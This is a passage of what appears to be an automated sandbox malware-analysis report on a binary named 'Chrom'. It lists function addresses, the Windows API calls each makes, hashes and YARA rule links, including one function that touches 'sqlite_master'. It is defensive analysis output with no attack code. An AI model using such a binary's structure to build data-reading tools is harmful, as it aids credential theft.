                                                                                                                                                        • memcpy.MSVCRT(0045B474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401C27,?,?,?,?,00458788,0000000C), ref: 0040B54A
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B557
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1865533344-0
                                                                                                                                                        • Opcode ID: f0960726fd40cdc9ae45f90f762857dd8f0b7d200d88f073f2e85c6963b5fa7f
                                                                                                                                                        • Instruction ID: aafbb257eb0cb79d1a62da41bbc700b7fe6572c6948dd35e3e17e6ab681315f4
                                                                                                                                                        • Opcode Fuzzy Hash: f0960726fd40cdc9ae45f90f762857dd8f0b7d200d88f073f2e85c6963b5fa7f
                                                                                                                                                        • Instruction Fuzzy Hash: 16118C71604601AFD328DF1DC891E26F7E5EFD9304B25892EE49A97381DB35E801CB68
                                                                                                                                                        Function 0041638F Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004163BB
                                                                                                                                                          • Part of subcall function 0040A912: _snwprintf.MSVCRT ref: 0040A957
                                                                                                                                                          • Part of subcall function 0040A912: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A967
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004163E4
                                                                                                                                                        • memset.MSVCRT ref: 004163EE
                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044F4CC,?,00002000,?), ref: 00416410
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1127616056-0
                                                                                                                                                        • Opcode ID: fd369af08461e68e8af29ce9eb542014cb5cfd53075e89779255da270f569b26
                                                                                                                                                        • Instruction ID: f3ab12530ca15f18597a66c6933a9b69f611745656a43028b292f8596be22397
                                                                                                                                                        • Opcode Fuzzy Hash: fd369af08461e68e8af29ce9eb542014cb5cfd53075e89779255da270f569b26
                                                                                                                                                        • Instruction Fuzzy Hash: 7C118EB2600219AFDF11AF65EC02EDE3B69EF05704F11006AFB05F2061E6359E648BAD
                                                                                                                                                        Function 00416CF0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 00416D00
                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00416D32
                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00416D46
                                                                                                                                                        • wcscpy.MSVCRT ref: 00416D59
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3917621476-0
                                                                                                                                                        • Opcode ID: 6a246380b1c5f8880238d42239ebf0d3dc96a60f32716ef5ab3fc8f08e63b26a
                                                                                                                                                        • Instruction ID: e53360a3a95c928778c5eecace91b7a860d411a781c8edf1bb59ff18ee2a4c16
                                                                                                                                                        • Opcode Fuzzy Hash: 6a246380b1c5f8880238d42239ebf0d3dc96a60f32716ef5ab3fc8f08e63b26a
                                                                                                                                                        • Instruction Fuzzy Hash: AC11EC75A00208AFDB10DFA5D9889EEB7F8FB49304F10446AE505E7200DB38DB45CB65
                                                                                                                                                        Function 00431D8F Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 00431DCA
                                                                                                                                                        • memset.MSVCRT ref: 00431DD4
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,00000000,?,00000000,00000068,?,?,00000068), ref: 00431DFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID: sqlite_master
                                                                                                                                                        • API String ID: 438689982-3163232059
                                                                                                                                                        • Opcode ID: 50ce9bdbcbbafd13e081e20970f75e6f660356cc808d36c36f9c0c11973c8031
                                                                                                                                                        • Instruction ID: 9f101942a68db4e790d7b6a69b6e003f8a3c489338379646b69a5518e9817596
                                                                                                                                                        • Opcode Fuzzy Hash: 50ce9bdbcbbafd13e081e20970f75e6f660356cc808d36c36f9c0c11973c8031
                                                                                                                                                        • Instruction Fuzzy Hash: E101B972944218BAEB11BBA18C42FDEB77DFF04318F10055AF50062042D73AA615C7A5
                                                                                                                                                        Function 00410AFB Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                          • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                          • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00410B28
                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00410B8D
                                                                                                                                                          • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00410B53
                                                                                                                                                        • wcscat.MSVCRT ref: 00410B66
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 822687973-0
                                                                                                                                                        • Opcode ID: 0e6b7667e56475d7b9f4e87a61fadb8ecb0fd6bc9a92603bad5de248469984c0
                                                                                                                                                        • Instruction ID: d8a36cc9ebfe16c4016e2f7d8ce927a21bbfbb5a34db6cd482cb30cff4dedb25
                                                                                                                                                        • Opcode Fuzzy Hash: 0e6b7667e56475d7b9f4e87a61fadb8ecb0fd6bc9a92603bad5de248469984c0
                                                                                                                                                        • Instruction Fuzzy Hash: F40188B190030866F720F7B5CC86FEB73AC9B4070DF14446AB719E2183D679A9554A6D
                                                                                                                                                        Function 0041938B Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,004194B6,?), ref: 004193A9
                                                                                                                                                        • malloc.MSVCRT ref: 004193B0
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,004194B6,?), ref: 004193CF
                                                                                                                                                        • free.MSVCRT ref: 004193D6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2605342592-0
                                                                                                                                                        • Opcode ID: 7272131d04c6d774e786cc75aec82cebd7b04aebb3355190285584dbadfac89e
                                                                                                                                                        • Instruction ID: ffb41da00ab2b38d2186f0124ec64ac670dece32c0042acda28ef17f3fef3975
                                                                                                                                                        • Opcode Fuzzy Hash: 7272131d04c6d774e786cc75aec82cebd7b04aebb3355190285584dbadfac89e
                                                                                                                                                        • Instruction Fuzzy Hash: BBF0B4B260D21E7F7A102A655CC0C7BBB9CD68A2FCB20073FF520911C0D9555C0156B5
                                                                                                                                                        Function 0040A0F1 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040A0FF
                                                                                                                                                        • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 0040A117
                                                                                                                                                        • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 0040A12D
                                                                                                                                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 0040A150
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Item
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3888421826-0
                                                                                                                                                        • Opcode ID: 23c7d58ea5e9d2a7b917a314186be0afa9840c28c7dffcbe9a9049126b0066b5
                                                                                                                                                        • Instruction ID: 6ff75ca8442cb1aaba57c9855211930760e6665974d32c71f4c26f3b37502511
                                                                                                                                                        • Opcode Fuzzy Hash: 23c7d58ea5e9d2a7b917a314186be0afa9840c28c7dffcbe9a9049126b0066b5
                                                                                                                                                        • Instruction Fuzzy Hash: A3F06975A0020CBEDB018F958CC1CBFBBB9EB49784F20407AF504EA150D270AE11AB61
                                                                                                                                                        Function 00411F2F Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00411F50
                                                                                                                                                        • RegisterClassW.USER32(00000001), ref: 00411F75
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411F7C
                                                                                                                                                        • CreateWindowExW.USER32(00000000,00000000,0044F4CC,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00411FA2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2678498856-0
                                                                                                                                                        • Opcode ID: b5bbf0ae051fe51f02939c0630202113e2a9289baae73011afc51dd1c0ebc6e3
                                                                                                                                                        • Instruction ID: 99e030ddf9f13c5852d1981898f16885884db78983a3d6c06d17877ae79c9dc0
                                                                                                                                                        • Opcode Fuzzy Hash: b5bbf0ae051fe51f02939c0630202113e2a9289baae73011afc51dd1c0ebc6e3
                                                                                                                                                        • Instruction Fuzzy Hash: 350125B1901229ABD7109FA59C89ADFBFBCFF09710F10422AF108A2240D7B45A448BE8
                                                                                                                                                        Function 00419AB5 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00419AD2
                                                                                                                                                        • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00419AF2
                                                                                                                                                        • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00419AFE
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00419B0C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3727323765-0
                                                                                                                                                        • Opcode ID: 986a2fee5f05a16e76f0cef6e54be21541a9d0a22b66a179d935c389a5993231
                                                                                                                                                        • Instruction ID: f326d1aa279b3286dc61effd62df9caa1a27d224ff9dba1ebef161e5ee26a254
                                                                                                                                                        • Opcode Fuzzy Hash: 986a2fee5f05a16e76f0cef6e54be21541a9d0a22b66a179d935c389a5993231
                                                                                                                                                        • Instruction Fuzzy Hash: 5F01D175504208FFDB21DFA4EC84C9B77B8FB81754F20443AF502D5050E634AD48CB65
                                                                                                                                                        Function 0040F1F6 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040F21B
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044F684,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F234
                                                                                                                                                        • strlen.MSVCRT ref: 0040F246
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F257
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2754987064-0
                                                                                                                                                        • Opcode ID: af324034355b8326fc79afd52d6166ba087be1d4dfb2b911d4ab16e42422411b
                                                                                                                                                        • Instruction ID: 693f9c66229169b877fb65a07178d670502057314d81cba2c0b658d4e4f309f7
                                                                                                                                                        • Opcode Fuzzy Hash: af324034355b8326fc79afd52d6166ba087be1d4dfb2b911d4ab16e42422411b
                                                                                                                                                        • Instruction Fuzzy Hash: B8F04FB680121CBEFB01A7949CC5DEB776CDB05254F0040B2B705D2042E5749E488B78
                                                                                                                                                        Function 0040F187 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 0040F1AC
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F1C9
                                                                                                                                                        • strlen.MSVCRT ref: 0040F1DB
                                                                                                                                                        • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F1EC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2754987064-0
                                                                                                                                                        • Opcode ID: b6fc7f5051e315d886dd0844a980d33df026f7d5ca875cb3320374fcca0aa7ef
                                                                                                                                                        • Instruction ID: 214f2a4103aa1d7c130f25418be1d7ef950c2207e9cb189a5e29a9696e3271f8
                                                                                                                                                        • Opcode Fuzzy Hash: b6fc7f5051e315d886dd0844a980d33df026f7d5ca875cb3320374fcca0aa7ef
                                                                                                                                                        • Instruction Fuzzy Hash: B0F062B680111CBEEB81A794DC81DEB77ACEB05258F0180B2B749D2041E9749F4C4F7D
                                                                                                                                                        Function 0040374F Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00403774
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403791
                                                                                                                                                        • strlen.MSVCRT ref: 004037A3
                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004037B4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2754987064-0
                                                                                                                                                        • Opcode ID: 3a8f2ef2901fd1bf96b16f805e9566abfadfd8793c1561c94dc77c8a8d5e4b08
                                                                                                                                                        • Instruction ID: 1ce7aa51f862e36c5a0d70db4a972110d182e6fdccd903b3ebab4b2d8822c945
                                                                                                                                                        • Opcode Fuzzy Hash: 3a8f2ef2901fd1bf96b16f805e9566abfadfd8793c1561c94dc77c8a8d5e4b08
                                                                                                                                                        • Instruction Fuzzy Hash: C6F062B780121CBEFB01A794DCC5DEB776CDB05254F0040B2B705D2042E5749F488B79
                                                                                                                                                        Function 00415DC8 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A33E: memset.MSVCRT ref: 0040A35D
                                                                                                                                                          • Part of subcall function 0040A33E: GetClassNameW.USER32(?,00000000,000000FF), ref: 0040A374
                                                                                                                                                          • Part of subcall function 0040A33E: _wcsicmp.MSVCRT ref: 0040A386
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00415DEF
                                                                                                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 00415DFD
                                                                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00415E0B
                                                                                                                                                        • GetStockObject.GDI32(00000000), ref: 00415E13
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 764393265-0
                                                                                                                                                        • Opcode ID: 42e4004be367d569ef6b1ed2fd7568d25a8fc534219fc729a21696d2538a26ff
                                                                                                                                                        • Instruction ID: f6ca766a756f956276b7987b22366021d45869a5efd1f957245e1e0f0cc444aa
                                                                                                                                                        • Opcode Fuzzy Hash: 42e4004be367d569ef6b1ed2fd7568d25a8fc534219fc729a21696d2538a26ff
                                                                                                                                                        • Instruction Fuzzy Hash: 2BF04F36500209FBCF116FA4EC0AADE3B65FF85721F10413AF915A41F2CB79A9A49A49
                                                                                                                                                        Function 0040AD77 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
